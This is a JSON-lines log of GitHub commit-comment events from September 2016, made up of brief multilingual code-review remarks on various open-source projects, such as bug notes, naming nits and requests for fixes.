{"id":"4579856409","type":"CommitCommentEvent","actor":{"login":"medik"},"repo":{"name":"medik/Mat"},"payload":{"comment":{"id":19070495,"position":null,"line":null,"path":null,"commit_id":"e78512c4fcf17d55d29d9df35ba4921ba1008078","created_at":"2016-09-18T12:39:04Z","updated_at":"2016-09-18T12:39:04Z","body":"[Fixat.](https://github.com/medik/Mat/commit/5379214050c480ee00c97c6680ccbb0c71f138f7)"}},"created_at":"2016-09-18T12:39:04Z"}
{"id":"4579857896","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":19070496,"position":null,"line":null,"path":null,"commit_id":"957fb1a75bed32aadac78e466ea3eda82765a7b7","created_at":"2016-09-18T12:40:11Z","updated_at":"2016-09-18T12:40:11Z","body":"👍 "}},"created_at":"2016-09-18T12:40:11Z"}
{"id":"4579863386","type":"CommitCommentEvent","actor":{"login":"BenDol"},"repo":{"name":"GwtMaterialDesign/gwt-material-addins"},"payload":{"comment":{"id":19070501,"position":null,"line":null,"path":null,"commit_id":"77860a60779a8bf3ad34b9b5aacbd796229912f6","created_at":"2016-09-18T12:44:18Z","updated_at":"2016-09-18T12:44:18Z","body":"This implementation is incorrect the `buildOption` method should not be appending option data. Also mapping 2 sets of data is bad practice which can cause a lot of sync issues down to path. Please revert and resubmit or I can work on the patch. I will be doing another addin parse so if you could just submit an issue for this problem that would be great."}},"created_at":"2016-09-18T12:44:18Z"}
{"id":"4579864773","type":"CommitCommentEvent","actor":{"login":"codebrainz"},"repo":{"name":"codebrainz/geany"},"payload":{"comment":{"id":19070505,"position":26,"line":949,"path":"src/plugins.c","commit_id":"267a1651b9e405674bf762e59a4a1039ab9e72ee","created_at":"2016-09-18T12:45:19Z","updated_at":"2016-09-18T12:45:19Z","body":"This should have:\r\n\r\n```c\r\nelse\r\n  p->suffix = NULL;\r\n```\r\n\r\nTo prevent a double-free in `plugins_finalize()` maybe."}},"created_at":"2016-09-18T12:45:19Z"}
{"id":"4579865047","type":"CommitCommentEvent","actor":{"login":"tawen"},"repo":{"name":"tawen/qx-bt"},"payload":{"comment":{"id":19070506,"position":64,"line":39,"path":"index .html","commit_id":"0e64d34195772eb3a89a746ebd236f7024bd79a6","created_at":"2016-09-18T12:45:31Z","updated_at":"2016-09-18T12:45:31Z","body":"列表"}},"created_at":"2016-09-18T12:45:31Z"}
{"id":"4579867344","type":"CommitCommentEvent","actor":{"login":"xdevelnet"},"repo":{"name":"xdevelnet/temp"},"payload":{"comment":{"id":19070508,"position":23,"line":103,"path":"ore_grow_original_utf8_11.txt","commit_id":"df9c76a1f0e09183d9e25a455e388e9e494788ee","created_at":"2016-09-18T12:47:17Z","updated_at":"2016-09-18T12:47:17Z","body":"Вот тут не понял - что означает \"Мистер Неформал\"?"}},"created_at":"2016-09-18T12:47:17Z"}
{"id":"4579867482","type":"CommitCommentEvent","actor":{"login":"kevzlou7979"},"repo":{"name":"GwtMaterialDesign/gwt-material-addins"},"payload":{"comment":{"id":19070509,"position":null,"line":null,"path":null,"commit_id":"77860a60779a8bf3ad34b9b5aacbd796229912f6","created_at":"2016-09-18T12:47:25Z","updated_at":"2016-09-18T12:47:25Z","body":"Make sure in your patch to use Native Select2 onChange event to get the selected values. \r\nI will revert this now"}},"created_at":"2016-09-18T12:47:25Z"}
{"id":"4579868226","type":"CommitCommentEvent","actor":{"login":"kevzlou7979"},"repo":{"name":"GwtMaterialDesign/gwt-material-addins"},"payload":{"comment":{"id":19070512,"position":null,"line":null,"path":null,"commit_id":"77860a60779a8bf3ad34b9b5aacbd796229912f6","created_at":"2016-09-18T12:47:58Z","updated_at":"2016-09-18T12:47:58Z","body":"Also on RemoveItem event to return a corresponding removed item."}},"created_at":"2016-09-18T12:47:58Z"}
{"id":"4579868233","type":"CommitCommentEvent","actor":{"login":"xdevelnet"},"repo":{"name":"xdevelnet/temp"},"payload":{"comment":{"id":19070513,"position":17,"line":95,"path":"ore_grow_original_utf8_11.txt","commit_id":"df9c76a1f0e09183d9e25a455e388e9e494788ee","created_at":"2016-09-18T12:47:58Z","updated_at":"2016-09-18T12:47:58Z","body":"Ты вроде говорил, что у фанфика нет рейтинга 18+. Тогда я хз что тут делает слово \"ХУЙ\". :)\r\nМожет сменить на \"ДА ПОШЛИ ОНИ НА ФИГ!\"?"}},"created_at":"2016-09-18T12:47:58Z"}
{"id":"4579868409","type":"CommitCommentEvent","actor":{"login":"codebrainz"},"repo":{"name":"codebrainz/geany"},"payload":{"comment":{"id":19070514,"position":110,"line":1391,"path":"src/plugins.c","commit_id":"267a1651b9e405674bf762e59a4a1039ab9e72ee","created_at":"2016-09-18T12:48:06Z","updated_at":"2016-09-18T12:48:06Z","body":"Possible double-free here if `builtin_so_proxy.suffix` isn't reset to `NULL` as commented above."}},"created_at":"2016-09-18T12:48:06Z"}
{"id":"4579869071","type":"CommitCommentEvent","actor":{"login":"blacky0x0"},"repo":{"name":"dzieciou/curl-logger"},"payload":{"comment":{"id":19070515,"position":8,"line":21,"path":"src/main/java/com/github/dzieciou/testing/curl/CurlLoggingInterceptor.java","commit_id":"6b6f0358fef4e8f75ac6c9be55b7cf138e806945","created_at":"2016-09-18T12:48:35Z","updated_at":"2016-09-18T12:48:35Z","body":"I tried to do the following:\r\n* format headers in curl string;\r\n* disable `--insecure` and `--verbose` parameters\r\n* add `-i` parameter\r\n\r\nBut I had to create my own Interceptor with the same logic."}},"created_at":"2016-09-18T12:48:35Z"}
{"id":"4579870084","type":"CommitCommentEvent","actor":{"login":"xdevelnet"},"repo":{"name":"xdevelnet/temp"},"payload":{"comment":{"id":19070518,"position":56,"line":163,"path":"ore_grow_original_utf8_11.txt","commit_id":"df9c76a1f0e09183d9e25a455e388e9e494788ee","created_at":"2016-09-18T12:49:21Z","updated_at":"2016-09-18T12:49:21Z","body":"Строка 164, \"как самому отправиться в свой\". Звучит странно. Как будто-бы не хватает имени существительного после \"свой\". Может лучше сделать \"как отправиться к себе\"?"}},"created_at":"2016-09-18T12:49:21Z"}
{"id":"4579870987","type":"CommitCommentEvent","actor":{"login":"blacky0x0"},"repo":{"name":"dzieciou/curl-logger"},"payload":{"comment":{"id":19070520,"position":6,"line":188,"path":"src/main/java/com/github/dzieciou/testing/curl/Http2Curl.java","commit_id":"f66b0931046bcf475d99ee931f4660eba79f3ab4","created_at":"2016-09-18T12:50:04Z","updated_at":"2016-09-18T12:50:04Z","body":"Could you release a new version with this fix?"}},"created_at":"2016-09-18T12:50:04Z"}
{"id":"4579871382","type":"CommitCommentEvent","actor":{"login":"sgdc3"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":19070521,"position":9,"line":230,"path":"src/main/java/fr/xephi/authme/api/NewAPI.java","commit_id":"405bd563d8167282eec291886e9daa81ace6a3b8","created_at":"2016-09-18T12:50:19Z","updated_at":"2016-09-18T12:50:19Z","body":"Bukkit.getPlayer(name) works only with ingame players, @ljacqu "}},"created_at":"2016-09-18T12:50:19Z"}
{"id":"4579871523","type":"CommitCommentEvent","actor":{"login":"xdevelnet"},"repo":{"name":"xdevelnet/temp"},"payload":{"comment":{"id":19070522,"position":null,"line":null,"path":null,"commit_id":"df9c76a1f0e09183d9e25a455e388e9e494788ee","created_at":"2016-09-18T12:50:26Z","updated_at":"2016-09-18T12:50:26Z","body":"Строки 165-166: не многовато ли вызовов? Вызов... вызов..."}},"created_at":"2016-09-18T12:50:26Z"}
{"id":"4579872852","type":"CommitCommentEvent","actor":{"login":"sgdc3"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":19070524,"position":9,"line":230,"path":"src/main/java/fr/xephi/authme/api/NewAPI.java","commit_id":"405bd563d8167282eec291886e9daa81ace6a3b8","created_at":"2016-09-18T12:51:28Z","updated_at":"2016-09-18T12:51:28Z","body":"Does the code handle the case the player is null? Does it fail or the user is unregistered anyway?"}},"created_at":"2016-09-18T12:51:28Z"}
{"id":"4579873447","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19070527,"position":null,"line":null,"path":null,"commit_id":"0079074f9147f3b39cf544ad594ba60cb734e1c2","created_at":"2016-09-18T12:51:56Z","updated_at":"2016-09-18T12:51:56Z","body":"@Mindbreaker1 Thanks a lot for sharing your observations! I'd like to figure out something simple enough..."}},"created_at":"2016-09-18T12:51:56Z"}
{"id":"4579875164","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"TeamButter/android_hardware_samsung_sprd-common"},"payload":{"comment":{"id":19070530,"position":null,"line":null,"path":null,"commit_id":"1b02e6071fad853a96e4c6cc5343ed0a231a9e9d","created_at":"2016-09-18T12:53:15Z","updated_at":"2016-09-18T12:53:15Z","body":"Fixed!\r\nhttps://github.com/TeamButter/android_hardware_samsung_sprd-common/commit/afddcb524751a1ccee638c9bd2bf06b4bd099061"}},"created_at":"2016-09-18T12:53:15Z"}
{"id":"4579877311","type":"CommitCommentEvent","actor":{"login":"mecctro"},"repo":{"name":"SoylentNews/rehash"},"payload":{"comment":{"id":19070536,"position":5,"line":35,"path":"Makefile","commit_id":"6fd61f13034f7a41e2530a3c3de374fec57e92c1","created_at":"2016-09-18T12:54:59Z","updated_at":"2016-09-18T12:54:59Z","body":"Causes chown bomb with default install options on Debian 9. (Debian specific?)"}},"created_at":"2016-09-18T12:54:59Z"}
{"id":"4579877471","type":"CommitCommentEvent","actor":{"login":"NPellet"},"repo":{"name":"NPellet/jsGraph"},"payload":{"comment":{"id":19070537,"position":null,"line":null,"path":null,"commit_id":"47b759cb722d78cd6fd7f4cd6f6a6e9403b32e79","created_at":"2016-09-18T12:55:08Z","updated_at":"2016-09-18T12:55:08Z","body":"Ah good point, thanks."}},"created_at":"2016-09-18T12:55:08Z"}
{"id":"4579878746","type":"CommitCommentEvent","actor":{"login":"mecctro"},"repo":{"name":"SoylentNews/rehash"},"payload":{"comment":{"id":19070541,"position":12,"line":42,"path":"Makefile","commit_id":"6fd61f13034f7a41e2530a3c3de374fec57e92c1","created_at":"2016-09-18T12:56:06Z","updated_at":"2016-09-18T12:56:06Z","body":"No longer contains Apache 2.2.29 source, probably a better mirror than direct archive."}},"created_at":"2016-09-18T12:56:06Z"}
{"id":"4579879066","type":"CommitCommentEvent","actor":{"login":"ljacqu"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":19070543,"position":9,"line":230,"path":"src/main/java/fr/xephi/authme/api/NewAPI.java","commit_id":"405bd563d8167282eec291886e9daa81ace6a3b8","created_at":"2016-09-18T12:56:19Z","updated_at":"2016-09-18T12:56:19Z","body":"```java\r\n    /**\r\n     * Unregisters a player.\r\n     *\r\n     * @param initiator the initiator of this process (nullable)\r\n     * @param name the name of the player\r\n     * @param player the according Player object (nullable)\r\n     */\r\n    // We need to have the name and the player separate because Player might be null in this case:\r\n    // we might have some player in the database that has never been online on the server\r\n    public void adminUnregister(CommandSender initiator, String name, Player player) {\r\n```"}},"created_at":"2016-09-18T12:56:19Z"}
{"id":"4579879905","type":"CommitCommentEvent","actor":{"login":"ucasFL"},"repo":{"name":"LCTT/TranslateProject"},"payload":{"comment":{"id":19070548,"position":null,"line":null,"path":null,"commit_id":"76a3a8bf655990b0a5e2e69f8c8045beee7b0988","created_at":"2016-09-18T12:57:00Z","updated_at":"2016-09-18T12:57:00Z","body":"额额，大概是在输文件名的时候刚开始是中文输入所以数字后来就变成这样了。"}},"created_at":"2016-09-18T12:57:00Z"}
{"id":"4579881145","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"TeamButter/android_hardware_samsung_sprd-common"},"payload":{"comment":{"id":19070551,"position":null,"line":null,"path":null,"commit_id":"1b02e6071fad853a96e4c6cc5343ed0a231a9e9d","created_at":"2016-09-18T12:57:54Z","updated_at":"2016-09-18T12:57:54Z","body":"Weird. Why https://github.com/TeamButter/android_hardware_samsung_sprd-common/blob/cm-14.0/libstagefrighthw/Android.mk doesn't do it job?"}},"created_at":"2016-09-18T12:57:54Z"}
{"id":"4579881681","type":"CommitCommentEvent","actor":{"login":"demhydraz"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19070552,"position":9,"line":15,"path":"experiments/amulet/design/design-old.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-18T12:58:16Z","updated_at":"2016-09-18T12:58:16Z","body":"I too like the idea of a type specifically for bottoms; But when is it inferred? What's the type of\r\n\r\n```haskell\r\nlet x = x in x\r\n```?\r\n\r\nBottom? `a`?"}},"created_at":"2016-09-18T12:58:16Z"}
{"id":"4579882773","type":"CommitCommentEvent","actor":{"login":"mecctro"},"repo":{"name":"SoylentNews/rehash"},"payload":{"comment":{"id":19070554,"position":4,"line":1475,"path":"sql/mysql/slashschema_create.sql","commit_id":"9864d7a7cb9ace6850d0153675d82f9a33f1ccaf","created_at":"2016-09-18T12:59:07Z","updated_at":"2016-09-18T12:59:07Z","body":"Are these the right defaults / constraints, and or should `KEY  points (points)` reference another table?"}},"created_at":"2016-09-18T12:59:07Z"}
{"id":"4579884453","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"TeamButter/android_hardware_samsung_sprd-common"},"payload":{"comment":{"id":19070559,"position":null,"line":null,"path":null,"commit_id":"1b02e6071fad853a96e4c6cc5343ed0a231a9e9d","created_at":"2016-09-18T13:00:18Z","updated_at":"2016-09-18T13:00:18Z","body":"I think the LOCAL_MODULE definitions were unprotected."}},"created_at":"2016-09-18T13:00:18Z"}
{"id":"4579886266","type":"CommitCommentEvent","actor":{"login":"lotem"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19070560,"position":null,"line":null,"path":null,"commit_id":"61fe29ec86d241450bcd0cd33d46b1f713d0eb2f","created_at":"2016-09-18T13:01:40Z","updated_at":"2016-09-18T13:01:40Z","body":"@osfans 不用吧。在函數調用處抓錯。\r\n\r\n``` C++\r\nif (converters.find(encoding) != converters.end()) {\r\n  try {\r\n    auto converted = converters[encoding](code);\r\n  } catch (...) {\r\n  }\r\n}\r\n```"}},"created_at":"2016-09-18T13:01:40Z"}
{"id":"4579890381","type":"CommitCommentEvent","actor":{"login":"ljacqu"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":19070567,"position":9,"line":230,"path":"src/main/java/fr/xephi/authme/api/NewAPI.java","commit_id":"405bd563d8167282eec291886e9daa81ace6a3b8","created_at":"2016-09-18T13:04:03Z","updated_at":"2016-09-18T13:04:03Z","body":"@sgdc3 The player is only needed if he is online, to apply blind effect etc. If he is not online we don't need to interact with the Player object"}},"created_at":"2016-09-18T13:04:03Z"}
{"id":"4579891924","type":"CommitCommentEvent","actor":{"login":"mp911de"},"repo":{"name":"mp911de/spring-cloud-vault-config"},"payload":{"comment":{"id":19070572,"position":66,"line":66,"path":"spring-cloud-vault-config-ssl/src/main/java/org/springframework/cloud/vault/config/ssl/VaultPkiTemplate.java","commit_id":"d9815d96ec26edab8111ce5ffe60ab880754dfb2","created_at":"2016-09-18T13:05:14Z","updated_at":"2016-09-18T13:05:14Z","body":"Thanks for your input. That's what we're going to do. We learned a couple of things by evaluating the PKI backend features and that commit is not a final version for PKI/SSL support."}},"created_at":"2016-09-18T13:05:14Z"}
{"id":"4579893283","type":"CommitCommentEvent","actor":{"login":"ssbn-412-42"},"repo":{"name":"ssbn-412-42/Leaning"},"payload":{"comment":{"id":19070575,"position":null,"line":null,"path":null,"commit_id":"19842fa6a9736e4a758dbd4d317e247dfb01b0d6","created_at":"2016-09-18T13:06:16Z","updated_at":"2016-09-18T13:06:16Z","body":"C语言一维、二维数组的定义、初始化、赋值"}},"created_at":"2016-09-18T13:06:16Z"}
{"id":"4579893341","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19070576,"position":null,"line":null,"path":null,"commit_id":"f4b1f960c4cd9d220ec7c409e6d0e834e03e1fe2","created_at":"2016-09-18T13:06:19Z","updated_at":"2016-09-18T13:06:19Z","body":"astra-sm duplicate removed.\r\n"}},"created_at":"2016-09-18T13:06:19Z"}
{"id":"4579898693","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/appstores"},"payload":{"comment":{"id":19070585,"position":5,"line":6,"path":"it/whatsnew/whatsnew_android_50_beta.lang","commit_id":"0fe716b274dffa0e9ae172b7c96de9bd9c214cca","created_at":"2016-09-18T13:10:24Z","updated_at":"2016-09-18T13:10:24Z","body":"Scusate il ritardo…\r\nSemplificazione dell’interfaccia: le schede recenti si trovano ora nel pannello Cronologia"}},"created_at":"2016-09-18T13:10:24Z"}
{"id":"4579899287","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/literate-scientific-software"},"payload":{"comment":{"id":19070588,"position":null,"line":null,"path":null,"commit_id":"beb90fb4fa0aa1c68876199e1dff7e4fa28c5ccf","created_at":"2016-09-18T13:10:50Z","updated_at":"2016-09-18T13:10:50Z","body":"Don't you want `Summation :: (Symbol -> Maybe (Bound, Bound)) -> Expr -> UFunc` instead?  In other words, isn't there always a variable of summation available?\r\n\r\nAlso, shouldn't `Integral` have the same signature?  Or are there weird examples where an integral has just a lower/upper bound of integration?\r\n\r\nAlso, I think `dep` is wrong.  First, there can be things in the bounds of an integral/sum that something can depend on.  Second, since sum/integral are up to alpha-equivalence, you should explicitly NOT depend on the summation/integration variable!  That's why it is useful to have it separate, so you can remove it from the dependencies."}},"created_at":"2016-09-18T13:10:50Z"}
{"id":"4579899560","type":"CommitCommentEvent","actor":{"login":"raoulvdberge"},"repo":{"name":"way2muchnoise/refinedstorage"},"payload":{"comment":{"id":19070590,"position":13,"line":54,"path":"src/main/java/refinedstorage/tile/TileDiskManipulator.java","commit_id":"423ecee0996fca203099fc69735878f45b541f46","created_at":"2016-09-18T13:11:04Z","updated_at":"2016-09-18T13:11:04Z","body":"typo: IO_MOD / IO_MODE"}},"created_at":"2016-09-18T13:11:04Z"}
{"id":"4579900957","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/appstores"},"payload":{"comment":{"id":19070593,"position":5,"line":6,"path":"it/whatsnew/whatsnew_android_50_beta.lang","commit_id":"6c9de083f06af24a34b700470879a3466c769fca","created_at":"2016-09-18T13:12:05Z","updated_at":"2016-09-18T13:12:05Z","body":"Scusate il ritardo…\r\nSemplificazione dell’interfaccia: le schede recenti si trovano ora nel pannello Cronologia"}},"created_at":"2016-09-18T13:12:05Z"}
{"id":"4579902848","type":"CommitCommentEvent","actor":{"login":"lGuillaume124"},"repo":{"name":"Sonerezh/sonerezh"},"payload":{"comment":{"id":19070595,"position":5,"line":441,"path":"lib/Cake/View/Helper/PaginatorHelper.php","commit_id":"bfb12291dc0b669d6bf300abd81a64bdb6780918","created_at":"2016-09-18T13:13:30Z","updated_at":"2016-09-18T13:13:30Z","body":"Hello,\r\nI don't think it is a good idea to hack the CakePHP core lib. It will not be backported on the next CakePHP update and the changes will be lost."}},"created_at":"2016-09-18T13:13:30Z"}
{"id":"4579902870","type":"CommitCommentEvent","actor":{"login":"raoulvdberge"},"repo":{"name":"way2muchnoise/refinedstorage"},"payload":{"comment":{"id":19070596,"position":53,"line":249,"path":"src/main/java/refinedstorage/tile/TileDiskManipulator.java","commit_id":"423ecee0996fca203099fc69735878f45b541f46","created_at":"2016-09-18T13:13:31Z","updated_at":"2016-09-18T13:13:31Z","body":"nit: variable name should be remainder"}},"created_at":"2016-09-18T13:13:31Z"}
{"id":"4579903541","type":"CommitCommentEvent","actor":{"login":"hudokkow"},"repo":{"name":"hudokkow/xbmc"},"payload":{"comment":{"id":19070598,"position":null,"line":null,"path":null,"commit_id":"05843f9df9424319e9b28c525f0b0e6104460615","created_at":"2016-09-18T13:14:03Z","updated_at":"2016-09-18T13:14:03Z","body":"@garbear, you need this in retroplayer branch"}},"created_at":"2016-09-18T13:14:03Z"}
{"id":"4579903820","type":"CommitCommentEvent","actor":{"login":"raoulvdberge"},"repo":{"name":"way2muchnoise/refinedstorage"},"payload":{"comment":{"id":19070600,"position":26,"line":222,"path":"src/main/java/refinedstorage/tile/TileDiskManipulator.java","commit_id":"423ecee0996fca203099fc69735878f45b541f46","created_at":"2016-09-18T13:14:14Z","updated_at":"2016-09-18T13:14:14Z","body":"why ii and not just i?"}},"created_at":"2016-09-18T13:14:14Z"}
{"id":"4579904041","type":"CommitCommentEvent","actor":{"login":"raoulvdberge"},"repo":{"name":"way2muchnoise/refinedstorage"},"payload":{"comment":{"id":19070602,"position":30,"line":226,"path":"src/main/java/refinedstorage/tile/TileDiskManipulator.java","commit_id":"423ecee0996fca203099fc69735878f45b541f46","created_at":"2016-09-18T13:14:23Z","updated_at":"2016-09-18T13:14:23Z","body":"call this one j"}},"created_at":"2016-09-18T13:14:23Z"}
{"id":"4579904565","type":"CommitCommentEvent","actor":{"login":"raoulvdberge"},"repo":{"name":"way2muchnoise/refinedstorage"},"payload":{"comment":{"id":19070603,"position":96,"line":314,"path":"src/main/java/refinedstorage/tile/TileDiskManipulator.java","commit_id":"423ecee0996fca203099fc69735878f45b541f46","created_at":"2016-09-18T13:14:44Z","updated_at":"2016-09-18T13:14:44Z","body":"remainder"}},"created_at":"2016-09-18T13:14:44Z"}
{"id":"4579904651","type":"CommitCommentEvent","actor":{"login":"hudokkow"},"repo":{"name":"hudokkow/xbmc"},"payload":{"comment":{"id":19070604,"position":null,"line":null,"path":null,"commit_id":"f3df1d8404e59cd215c7d0437263a3983f59938c","created_at":"2016-09-18T13:14:48Z","updated_at":"2016-09-18T13:14:48Z","body":"@garbear, and this"}},"created_at":"2016-09-18T13:14:48Z"}
{"id":"4579904943","type":"CommitCommentEvent","actor":{"login":"raoulvdberge"},"repo":{"name":"way2muchnoise/refinedstorage"},"payload":{"comment":{"id":19070606,"position":23,"line":99,"path":"src/main/java/refinedstorage/tile/config/IFilterable.java","commit_id":"423ecee0996fca203099fc69735878f45b541f46","created_at":"2016-09-18T13:15:01Z","updated_at":"2016-09-18T13:15:01Z","body":"braces"}},"created_at":"2016-09-18T13:15:01Z"}
{"id":"4579906608","type":"CommitCommentEvent","actor":{"login":"raoulvdberge"},"repo":{"name":"way2muchnoise/refinedstorage"},"payload":{"comment":{"id":19070609,"position":5,"line":99,"path":"src/main/resources/assets/refinedstorage/lang/en_US.lang","commit_id":"423ecee0996fca203099fc69735878f45b541f46","created_at":"2016-09-18T13:16:11Z","updated_at":"2016-09-18T13:16:11Z","body":"actually, other blocks just use \"mode\"... I think you can drop the \"IO\" part. Don't forget to remove it in translations & NBT save key."}},"created_at":"2016-09-18T13:16:11Z"}
{"id":"4579907529","type":"CommitCommentEvent","actor":{"login":"lostella"},"repo":{"name":"kul-forbes/Prox.jl"},"payload":{"comment":{"id":19070610,"position":null,"line":null,"path":null,"commit_id":"a7e6248dbe59978fb983fa532a7b29520f142c49","created_at":"2016-09-18T13:16:48Z","updated_at":"2016-09-18T13:16:48Z","body":"Regarding computing the value function at the prox point along with the point itself: I understand your concern, but I believe it should at least be an option."}},"created_at":"2016-09-18T13:16:48Z"}
{"id":"4579908146","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"muraapp/achieve"},"payload":{"comment":{"id":19070613,"position":8,"line":50,"path":"app/controllers/blogs_controller.rb","commit_id":"e651b74f603b3733ceae7a393e9ad1b05f61a74d","created_at":"2016-09-18T13:17:13Z","updated_at":"2016-09-18T13:17:13Z","body":"これ、イルノデスカ？\r\nbefore_acrionで、set_blogを呼び出しますよね？？"}},"created_at":"2016-09-18T13:17:13Z"}
{"id":"4579908756","type":"CommitCommentEvent","actor":{"login":"raoulvdberge"},"repo":{"name":"way2muchnoise/refinedstorage"},"payload":{"comment":{"id":19070615,"position":14,"line":85,"path":"src/main/java/refinedstorage/tile/config/IFilterable.java","commit_id":"423ecee0996fca203099fc69735878f45b541f46","created_at":"2016-09-18T13:17:42Z","updated_at":"2016-09-18T13:17:42Z","body":"can you make getFluidStackInSlot() also be used in other parts of the codebase?"}},"created_at":"2016-09-18T13:17:42Z"}
{"id":"4579909814","type":"CommitCommentEvent","actor":{"login":"kvaps"},"repo":{"name":"kvaps/docker-kolab"},"payload":{"comment":{"id":19070616,"position":4,"line":16,"path":"etc/load_envs.conf","commit_id":"0aa0a9f09e1be4e3ae915b27192a6998453f3f3e","created_at":"2016-09-18T13:18:27Z","updated_at":"2016-09-18T13:18:27Z","body":"sure, thanks!"}},"created_at":"2016-09-18T13:18:27Z"}
{"id":"4579910266","type":"CommitCommentEvent","actor":{"login":"jackyphuong"},"repo":{"name":"jackyphuong/coretracking"},"payload":{"comment":{"id":19070618,"position":null,"line":null,"path":null,"commit_id":"85c40dda323d171dc10d7ac503a60ef09ca8def1","created_at":"2016-09-18T13:18:45Z","updated_at":"2016-09-18T13:18:45Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;L1uO777S&#x2F;2-users-component\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Users Component</a>"}},"created_at":"2016-09-18T13:18:45Z"}
{"id":"4579910598","type":"CommitCommentEvent","actor":{"login":"KeepingThinker"},"repo":{"name":"KeepingThinker/housemanager"},"payload":{"comment":{"id":19070619,"position":null,"line":null,"path":null,"commit_id":"99c388aab793dcd747f0a3ca9ed4c73ab1066475","created_at":"2016-09-18T13:19:01Z","updated_at":"2016-09-18T13:19:01Z","body":"小修改"}},"created_at":"2016-09-18T13:19:01Z"}
{"id":"4579910625","type":"CommitCommentEvent","actor":{"login":"yuminjie"},"repo":{"name":"yuminjie/prac"},"payload":{"comment":{"id":19070620,"position":null,"line":null,"path":null,"commit_id":"54e9790d5ce703568fac55e871c8ce4685668580","created_at":"2016-09-18T13:19:02Z","updated_at":"2016-09-18T13:19:02Z","body":"hhhhhhhhhh"}},"created_at":"2016-09-18T13:19:02Z"}
{"id":"4579910813","type":"CommitCommentEvent","actor":{"login":"yuminjie"},"repo":{"name":"yuminjie/prac"},"payload":{"comment":{"id":19070621,"position":null,"line":null,"path":null,"commit_id":"54e9790d5ce703568fac55e871c8ce4685668580","created_at":"2016-09-18T13:19:10Z","updated_at":"2016-09-18T13:19:10Z","body":"hhhfffffettttttt"}},"created_at":"2016-09-18T13:19:10Z"}
{"id":"4579915541","type":"CommitCommentEvent","actor":{"login":"RomainLanz"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":19070630,"position":null,"line":null,"path":null,"commit_id":"b5bfac08209462ad49a91ef2d21fb34e6b39233a","created_at":"2016-09-18T13:22:35Z","updated_at":"2016-09-18T13:22:35Z","body":"You should take a look to https://commitizen.github.io/cz-cli/. It's easy to create changelog by using a convention when commiting."}},"created_at":"2016-09-18T13:22:35Z"}
{"id":"4579917867","type":"CommitCommentEvent","actor":{"login":"oknet"},"repo":{"name":"apache/trafficserver"},"payload":{"comment":{"id":19070637,"position":11,"line":475,"path":"iocore/net/SSLNetVConnection.cc","commit_id":"9a1b0fcf098ff104dd375f99ad650a4e426f56fd","created_at":"2016-09-18T13:24:16Z","updated_at":"2016-09-18T13:24:16Z","body":"readSignalError(nh, ETIMEDOUT); ???"}},"created_at":"2016-09-18T13:24:16Z"}
{"id":"4579922986","type":"CommitCommentEvent","actor":{"login":"danfe"},"repo":{"name":"appleseedhq/appleseed"},"payload":{"comment":{"id":19070643,"position":45,"line":174,"path":"src/appleseed/renderer/kernel/rendering/generic/generictilerenderer.cpp","commit_id":"b29c75acc89e2b9c8f04a9adbf261941cfcdd56d","created_at":"2016-09-18T13:27:45Z","updated_at":"2016-09-18T13:27:45Z","body":"This line won't compile (in 32-bit mode) because of superfluous closing `)`."}},"created_at":"2016-09-18T13:27:45Z"}
{"id":"4579923419","type":"CommitCommentEvent","actor":{"login":"SquidDev"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19070644,"position":9,"line":15,"path":"experiments/amulet/design/design-old.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-18T13:28:03Z","updated_at":"2016-09-18T13:28:03Z","body":"'twould be `a`."}},"created_at":"2016-09-18T13:28:03Z"}
{"id":"4579923885","type":"CommitCommentEvent","actor":{"login":"hansuze"},"repo":{"name":"hansuze/Resume"},"payload":{"comment":{"id":19070646,"position":null,"line":null,"path":null,"commit_id":"da3dbe5df33e3292da63e4794febc7633d778909","created_at":"2016-09-18T13:28:20Z","updated_at":"2016-09-18T13:28:20Z","body":"xiaohan80s"}},"created_at":"2016-09-18T13:28:20Z"}
{"id":"4579926475","type":"CommitCommentEvent","actor":{"login":"cravay"},"repo":{"name":"motivationsbanner/client"},"payload":{"comment":{"id":19070647,"position":null,"line":null,"path":null,"commit_id":"64ad410aca1ebc5a78e5f4d35e1690e962a453fa","created_at":"2016-09-18T13:30:04Z","updated_at":"2016-09-18T13:30:04Z","body":"i like it"}},"created_at":"2016-09-18T13:30:04Z"}
{"id":"4579929746","type":"CommitCommentEvent","actor":{"login":"spjspj"},"repo":{"name":"magefree/mage"},"payload":{"comment":{"id":19070653,"position":12,"line":62,"path":"Mage.Sets/src/mage/sets/kaladesh/RenegadeFreighter.java","commit_id":"bf16b25f5151b511f72334c73798235cb27b17af","created_at":"2016-09-18T13:32:24Z","updated_at":"2016-09-18T13:32:24Z","body":"I'm not sure that this line is needed @cg5-  .  The 'gainAbilitySourceEffect' may already add that automagically\r\n"}},"created_at":"2016-09-18T13:32:24Z"}
